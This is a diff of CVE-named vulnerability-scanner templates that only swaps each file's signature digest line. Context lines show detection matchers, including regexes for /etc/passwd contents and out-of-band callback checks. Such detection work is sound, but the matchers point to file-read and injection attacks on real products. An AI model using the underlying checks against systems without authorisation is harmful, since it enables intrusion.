a/http/cves/2023/CVE-2023-39141.yaml b/http/cves/2023/CVE-2023-39141.yaml index 7780e0ce72..6051ad0bbe 100644 --- a/http/cves/2023/CVE-2023-39141.yaml +++ b/http/cves/2023/CVE-2023-39141.yaml @@ -48,4 +48,4 @@ http: - 'contains(body_1, "Aria2 WebUI")' - 'regex("root:x:0:0:",body_2)' condition: and -# digest: 4a0a0047304502205642c88712c4ca0de0dc516a86a8b77ef72c1cd5a3a62d78bd3de9c30a461a1402210082ed3fac6d044d18c610af07f0b4979e18c4643720c27be2843249a7ee965742:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a38d7e3d153b3ca9f265e415de91c44b4ad3fc85616857375dd7d2a497452520022065e6ee9c6a28f3f4532fb908c2729c6bebd94b235f44854b7ccd57a63c9bcbad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39143.yaml b/http/cves/2023/CVE-2023-39143.yaml index 99f44d3e25..ef022f0128 100644 --- a/http/cves/2023/CVE-2023-39143.yaml +++ b/http/cves/2023/CVE-2023-39143.yaml @@ -51,4 +51,4 @@ http: - contains(to_lower(content_type), "image/png") - contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex condition: and -# digest: 4a0a00473045022025fa7213cde7b40ca9e398ead9280e4297d285a3cad3948d79b396586c5ada500221008b224395ac8dfc494bb435b7b7c5102e2515eb19d27157d070df13c766c10e38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4b39621fcab1929272ab47121f4a4b867f1b56ea253efa9d279485bbb236063022100bfaa457890fb2327e090c027195d0101e3aa5236c5f7ffaadceb61282b17874e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39361.yaml b/http/cves/2023/CVE-2023-39361.yaml index b5bc7e7301..3ce5c7f525 100644 --- a/http/cves/2023/CVE-2023-39361.yaml +++ b/http/cves/2023/CVE-2023-39361.yaml @@ -55,4 +55,4 @@ http: - 'status_code == 200' - 'contains_all(body, "Tree Mode", "cacti")' condition: and -# digest: 4b0a00483046022100dd81fab299fe2f6dfd7848f41bdedef38af20eca6216c03868f2459ab0e54287022100b67c2e415c35823e85ebfe762f7e828909e4eeb134360312d24ee5e68c5cd95d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022002af61baaf992b1167e9f2985b01c088d748134231a69f9fd3a5381851a758c402202527d2063c1039eefc8947a87236bf4cb6fcb0cccf8d8e5d6d1fe9346f0ef463:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39598.yaml b/http/cves/2023/CVE-2023-39598.yaml index fc13a1cbc9..06471cacf5 100644 --- a/http/cves/2023/CVE-2023-39598.yaml +++ b/http/cves/2023/CVE-2023-39598.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220752d5fdf38bf0e6755332bfc4826a2b58985659f3351ecf5cdfe7cd736c5239d022100f71fb0de070712b29e120694ed800c06fc13a08f93ee7de72c7bc3beed77849a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b61cc4082f72e9770eabedfb6b301b7590959070f5bb1b6f14227b274ac82bc5022100c14f59d395c1494ad92a9ef23f1b51bb8547b853478e8dfbb4792b31ca0c0d2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39600.yaml b/http/cves/2023/CVE-2023-39600.yaml index bd637c4b08..000ff0a8a9 100644 --- a/http/cves/2023/CVE-2023-39600.yaml +++ b/http/cves/2023/CVE-2023-39600.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008d42e07ce0725cc3c29bc283508e66446d4e4ea04ad76ef351806af55652899a022100b20754cdd73731a8db161450ad7163b290c3e877d388e6d0892cb0f816dce251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220223da6b4cc7f2ee5e43255592d8c512cb4515155f974d5690551bb55b44b73fc02200baec7d7281c07eccf1b162ce42f9d46f68999c589f704af58c07bd958e679d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index d0a46833b4..a357493b36 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210081fd832306abb4c2db24ccc4def607909798787bc61db7834428d4677baf10ea0221009f538af7773ea40facf783b248a551184e163f2c19291d156c36330425ca64ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220615d5617cd97e41cd4640501b04b93e2a9119b4a562c416f9294b4b7589e1406022066f5701e58953a2266b8295e991d107419138bbd7edc9bfe3845d143f0df17be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index 0504ff9dc0..07d52b9b98 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -56,4 +56,4 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 4a0a0047304502200f1a0c8bcefa038f928d8c3d428072dbf999a9204695c95506ed91ff90ee2c8d022100a91d93e2e994eb753b83e53e8c90515b98407dc3897a8f8984177dd56261da60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100be2fd9b723534f19814f60f7d477a325d41fe610a3a988fb532d5a822f51da0e022100a497a14901a48c93369699a523b8cff0405d5695047617009083552316d567b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39700.yaml b/http/cves/2023/CVE-2023-39700.yaml index f6da835bb6..a63ea622d7 100644 --- a/http/cves/2023/CVE-2023-39700.yaml +++ b/http/cves/2023/CVE-2023-39700.yaml @@ -51,4 +51,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, ">") && contains(body, "IceWarp")' condition: and -# digest: 4a0a00473045022100b2ae7ae440b4eec6e6da255baf7f80cc35c640f8e7e4de0a5d363d2a8767f387022071038577f46d450adbb855b9ec4df1a5badf08408433fffb0972b205e056be4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080543a209ab39db177f7068a1e48f1b1f0439fb77f185bd17c00975df65c142d022100e6a96d41521239a3c7404f5f4a76a26be03aa8db4332889f9950f405beee3557:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index 65907be765..27aec1af7d 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100f21a2b81ae7fd83b758582647b0492ff9a140bba7412af9fbd1a9acfc5e27583022100e2cfcb50142a1e7f75d7dbb067c13e075607a023ae2c018557176eba2df700da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030c7ded8a24db2f131af13a37bca3b80726fabd37cee41f01b6d1488fab6cefe02202e9547ec28444e0231b9920f6483b5f311816f96778a3aa1a0f4539e9b1884b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index 80c04eaec1..64fbd7a8c2 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 4a0a0047304502205038e6120fa114f34508a9045dd6dc65f891cc5c9a393034fe1b0d8bfe8c848d022100ba9cb87c17ffbbc41a4ed0d2977869a86cdb4b30886fc3c032a36b12964856b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f292e466e458da63a1ca2e01795aa6c7f535d773f3c384a3d25cd1fae8c3ddfb02210095957e0f35bea7d57513d789df742020893ea3bd7d05a05389520bc4e9c75dd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index a5a9fe71b8..e616b38467 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -43,4 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains_all(body, "Passengers", "Drop-off address", ">")' condition: and -# digest: 4b0a00483046022100a418b709d2b7082873e897a36eafc1bbb1f3aa8709f7f2e4c49d412cef87d40e022100afe22952963f904e49afc245fd7b7ebce634024e4f0289a90de498a8574096d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008c1f36c601fc8963fc32e00b4fdb8e8a6269b00d3f59e5dd8216ecf1ae06de4d022100a7e5be57de477a7cdb02508af120769b1fa8caa60d40df44ba59630a533f97e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index e43edf1e32..f83527d736 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -58,4 +58,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(header, 'Bad Request') condition: and -# digest: 4a0a00473045022100f301d69b556a95e9154963b4f371aba1261981f5a5201b53ae8f30f12833908402207c56e74c9c34d7c1a82534086eac52d23e022a6b59447e7f877a92e227d79efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200fd96b61a99a99ef4072c41f731c2d128cdb00619b68342fb25b5805f10cda0c0221008c74aa87747eb04a6771f88163304b3510220dccc8c60b5fe5ce40388c9cfbc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index f7905e4745..7dd9722ae9 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -52,4 +52,4 @@ http: - contains(to_lower(set_cookie), 'x-qlik-session') - contains(body, 'The comparison expression does not consist of three elements') condition: and -# digest: 490a004630440220405aa3356f11e260c674c3e45a4333571ad339aac53cdc3eabe2736ecf752c8502207a342b810f3fcb5adf83a17f60888d57f6a458937e755ececc1fb862f3e8d713:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d28967c1386ea69f0f40305e3d7ad2ff52a9dddf10ab9149f4231d06e4ea1166022056accbcd5aa55ffdfcde7bd666ffa7bb5f0eca6db1d05a2ac7c82f7458311a8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 8d20471505..e3538f906f 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 404 -# digest: 490a00463044022000a0cc69486d6d9cbda953429f12b560b53462ee713d9e032f548c492903087c022046613a2e9d8e8ce1405dcf3366c8f551d340a96f7c337ed0c3495273864b492e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022023cad3861adbf0bc6237e47f9f8191aeb6e2ecf983e5056216df00cb97e884ce022100be49e1f8630f7ac7b0023eb9bfa3f09d97b93f4edae687f5b9dd9c2bc2f05fcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 2852509cb3..d4a6775564 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -59,4 +59,4 @@ http: part: header words: - "text/html" -# digest: 4a0a0047304502210083964b313e7a000d9ca10222db41e2eee010e7cd8de85ee18f2db5cad563203a022032222c84acefa05972a5e7cbc5abe8dc5b06bb5c6fe3f3a7f3dbfe496185e9a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100982e4b04752783b0200c9e3387496ebf4cda655ed340987b6716d6c6b82cd8e502210097432437c8730b721768f5d5c3a6f5ff991556d4ea5e49f4af55e57a2e72d9eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index 840c4334e5..337e85cf20 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -49,4 +49,4 @@ http: part: body words: - 'Skype' -# digest: 4a0a004730450221008574c7ffe3f2d223a370c177cd5f6a730ad922172a140cbffc9f5a9f8816d7b2022063b5865c4679400fa4eccb249c810758f208573eb01c9d2c7dd29a12a74aa6b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d30c98fd761c1575f50adc66b24f054a599a93be7fb3fcd37811c8be3983fdf80220255a844b0f065ce472e8ee890271dd701b61ee378e1fb86b6dd45a1c2f5dca4c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index a595d0cccc..e665e96b11 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -53,4 +53,4 @@ http: - "CraftCMS" condition: and case-insensitive: true -# digest: 4b0a00483046022100aad1f217ee128d29074789cd117c40e3282239935d06572fcaa77b86163f341e02210095f7a4e31640bdb832d3ea6eca1444a46122d4ab75e9694e88c664052c6699d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032305cd530842d67b635ec10e385f6424a8e71b9babad091d0d16238d501654102207426ea893d05841ab2e149c76f9a759040d2c58acb3a2a4e6c47285acbfe3f1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 260cec8948..0430e4f10a 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -39,4 +39,4 @@ http: - 'Apache Chemistry OpenCMIS' - '' condition: and -# digest: 490a00463044022076759a64ec8dcf9d061745db5d2542a5ac1e41ecbbed76ac48d4de5e23e38a57022046d2065515fddaff3bb682600a0e4500ffb0d8b44d539031bfd8fb89ea8cd091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ec8cd697c46ef8ebf1f06b19f7a09d1bc6bfd5668d1c39e73eadd911b7ec813e0221008d5a832ae4403ba0ddc92701308747190c2df6d87eccc1551133709ef2ff3d8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 2a148fce70..c0dd88635e 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096ac59ffe6bcfa5dd7100c93ac3af8d09f2a4cac40b28fad5dabf9f9c9b5bcd8022100df7fdc6e652c63a0d7016de1c4e2968d33bed7836b40795689ba1a90e70c1e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220233c29e3487047b77769a298603acef5fab3841e3a829681e9a1093c7df9253b02204bad4b923b7bb8b66d316855fcca625797d90afb68e0eb2578b1dcf58dd7b0cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 7d2584371d..b9e2e56bdc 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -79,4 +79,4 @@ http: regex: - 'value="(.*?)"' internal: true -# digest: 4a0a0047304502205eaa6928145838a264b81009174c0dc9d2d07efed1abcc67ad062af010acdc59022100c3d2486f63bf27c5ee5f7979f5592a45a508ecffe3e3a82bd6606f185a3194d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9e13d07e6dc8ffc49d616435238b49c866fcee93e21da47209c28ae7de1e9ac022100d700d5b1d2ff0a8fd1bc3b56e389cbfd4f551ad143d281b6c9ed742eb020eb3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index e47ec1dfe8..89cb820a43 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -109,4 +109,4 @@ http: regex: - '(.*)' internal: true -# digest: 4a0a00473045022100a1e9081fcf2640083fdd862acec818d87d0f43577b03501b09a3ffb1e9fa52a0022058a1099f807d9fb0552b82ca66443623a6b96ac354f97bb5a13b40777c73743b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220493bb6fcbb5b0e17a203c29515fb7d3e84813d5da8775cddf045269de8a6f97f02210084f1354002a9be79b69f4f76c3cba09bdc1c9110d7e8d0e99db5d1dbf1a37299:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index b7db700045..2c624e7f27 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -67,4 +67,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and -# digest: 4b0a004830460221008a3d00145dba4f11fa3c549cfa464edc1794ba65015e1ab6ff2f303f742b48ad02210089f51b3a2d6226c518403fa409af45ac3721bc5826816fda85b9e55db8d1b961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ccd06c1d6b4afb0e01163a001a2c7cf4e28046454d7905bf5949f6076f999cf4022100acde6da1ea9ac5fc9dba22d88202661d83f7dc21e59d343a1868288df0b8b79b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 68cd272de0..04f449ba08 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -86,4 +86,4 @@ http: - contains_all(to_lower(interactsh_request), '{{string}}','{{value}}') - status_code == 200 condition: and -# digest: 4a0a0047304502202532b6c5eb4c8b86a6cbc92d99c1674017335e78d0932d798e89cbebd4e5e9e002210098facfd15b6f7d648364dcede3e8c1992b3c7a2d58b7b4200f5ce25ba1fc691a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203454d2f353de8b311b53f58885926aa14e79392ea0e4bf552c2653c214124ab9022070dc6c40140eb259e30e78f2a0c155725eabcf398c1a5f6ddbe6abf389ddc712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index fb1041ffa7..704174d31b 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -62,4 +62,4 @@ http: - "contains(body, 'ColdFusion')" - "contains(header, 'text/html')" condition: and -# digest: 490a00463044022059f1e5596ee1f04789829fe74baa6cb52966bf9b3c4389095a78032a93765fdf0220434facfe54a80f0b3571fab017d7d4e1b2dffce3ab40ed44ad4d1ab1977a2ca1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce96a082d0f000c92096a33e4c6682786c68f87204e8a007899a3aef0e64e524022051ee6b38721b584430ceea3db1394145a5708f8e91860151f52b4146a67b6992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index cf0a5659ad..2717f46c1f 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -88,4 +88,4 @@ http: - "status_code_3 == 500 && status_code_4 == 404" - contains(body_3, "coldfusion.runtime") condition: and -# digest: 4b0a00483046022100d8c27c20ad5d3c1c52b7a1ad36e3d3e1ee89d1c63ce26c18b8cd328f88d34e0e0221009b45448145bd15637757560e893ba4584359745deb71a3cb2e6a88c3fe692517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022016552548b902a20941bf3b8f74c6bb4168571b335e98fde72738a6b91f4bf39f02200c0098761471880e51ff1a9325790c071def7853d7c548302d5bb84f5178d7ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 08a4e56944..98cabf32a9 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100919530c2f7eb2d3d2714d81d366dfeb7bc9b208c1680d3cb1de728f8a718b6e402204a0caedb90860c959e6114777399de2c90c306bb411e57ff7b225308d11f8b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022063f28e329fc2092a3ffb840691830535abec15df1b086cadcf68c926b1d785f80221009b65b4daf1a07dfb75b36a8bd44f086cb9a9129fa3e77a5c6251f7e4cc975886:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 65f2741e71..7303570ecf 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -58,4 +58,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "")' condition: and -# digest: 490a004630440220136a9de10e94de42f088109120fa3ba436becffc820d8cf6ca179b443cbe6528022022a9923ab3af464a7edfb72ae5f34ed2ea5a1ed918f98aefe7ce55f5cf7fe821:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c60899a35754aaebff402853bedc6911e8558773043efb7ee2e8d542c607472d022100e088c6417867562abfd43d9c71877efe4797481beb6bdeebc3b4fb457c1bcc80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index c299f6dfbc..a14327d08d 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071bda73ca2ae11746f2c9685d5f5a43f5eef73cedecf65a6cdfa71c30d4a4e9c022100e71ac3a7b2ffbf2cf2a6215d2a11806033fd920b5cabe4378f53eefd1f6bb1bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201cdf99ca13ad865d44f6f19a8bf72b8b90211fd7771f01947c1559cfdeeb3b22022100a652cd0d4992c880a8e81df6e3e701e2d42e4d16f61058ece78137c5d3ebab6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index 0259a8e718..acf4230b7a 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -49,4 +49,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4b0a00483046022100cea4d3768425ffc332055d1f40fd366c8091a06a7b799b66e8b91090b83543670221008f1b308f749b58447861c6a69747cf99284ce97abb240eca5b47bece1e7d1249:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a36f31ac5e2649a9bca8782a9c836439dc0c1707ed49b1d6dfb3320fbcef834d0220716dd0d57089d321834e7d979a7281d444a6e13b73d59902030b2237564cb4f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index b592c84662..f6df7c98a8 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -56,4 +56,4 @@ http: - status_code == 302 - contains(content_type, "text/html") condition: and -# digest: 4b0a004830460221009ed47ceb0a90cf361c53d57e4de9cbf37f13e67f59c4ef3301f2b2df37b27d5e02210085057ec399c9228fdb57ce3ba2f16e674441a6a71eaa5d9a1e060407d67cd34f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f15c1bb56b22ab2f94529ddca1c0a06cbc06f0e07a1f56077c32b99e2c866bad022100b538a78680a96bcac30de2427b9197fa07b3502b9bf71699a5c9e5c50a88ac08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 19da7ce5f3..0e57b6db91 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022060df5103e223276fb6d8f055c980a6bbe35dd67b2306bb265e79f603b1e2cdcb0221009e6c96fe2685faf298d01023b503fbee99fbd2ea6d0061279e868f5e19ad0d6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009b3fb8f525f0694ccb8676f31859b245d7a2c5d2cdd98bf70624e863c2b02d570221008b136d5eccdd29859129ffed2b11f046e85bed6867a80bec6b5a9927f5dcb1e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index 289211b0d2..5730ad8670 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -43,4 +43,4 @@ http: - 'contains(header, "text/html")' - 'status_code == 404' condition: and -# digest: 4a0a0047304502206549e7d89d4cabf890f7dd5c47971d2d500c35cf05dc00991d8042f8ba05048702210088b175e088e53a64fcf3ee366894f0786a1449b7d949cf8fd59977c356e0501f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071053f9a6de1222144454acc010971215e52394fcf6105fad79729a4bab85587022100baca03fa65958de7da8455d4a8dbaba6456f951629aa6cc24a4acf9046f10ef9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 16b774543a..26c8efe30a 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022045817ca3e4b06f54006a083834f2f49c2cd46518d02df1e98005b2c039428ea4022100956c32e109de21a677f32a35f4b91d7683d144ddb68a4afa6dab8e02eb69841b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022061af53e49ff89431b21f4c73cd1766d421c1956e6e5833ffe4d4d03ca6d4f1dd022100a256d63fc52f62aef89b997b4fcf912d447e2b0aeddd53e8f74a767d5485ff0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 72c2cbc036..176e734a92 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -50,4 +50,4 @@ http: - 'contains_all(header, "application/json")' - 'contains_all(body, "traceroute: {{randstr}}: Unknown host", "daemon:x:1:1:")' condition: and -# digest: 4a0a0047304502210085b2b1f764e51be689c91047cc94f5cb4198bf49f465296a7981a95eea7357ca022055981c9b3c5fb91b61bbd0832c5036724efd1b7619dfa8ef96552ad6ea14e392:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f884c1a55710461c1a5f7dd21865ee459c81c817395cd3c2539d54683232e62702203f9ce7cb48966c4084a4d1fa1cf1e3696ce3af032290e6e3faf0a540b9ad0d7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-45855.yaml b/http/cves/2023/CVE-2023-45855.yaml index df95bf56ee..3bfaada1ba 100644 --- a/http/cves/2023/CVE-2023-45855.yaml +++ b/http/cves/2023/CVE-2023-45855.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220063229418aa406537c205e10dbb0c643676c5437c17c7a2d99e3951c6af78bd902204b4c4b4a1504f52e3b18c478bdcb12099c06fa51fb4cfe83b2609fcaa6d24f0e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e56df1cdf4a2f95836eef15fe7159b16232539b6130847915ca391722b2fda6a022100883868300f7d168a5617d481ba299432509133ebbdc32149a7ead90350e95cb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 3f369abe5d..1784eb8b73 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -122,4 +122,4 @@ http: regex: - 'name="form_id" value="([0-9]+)">' internal: true -# digest: 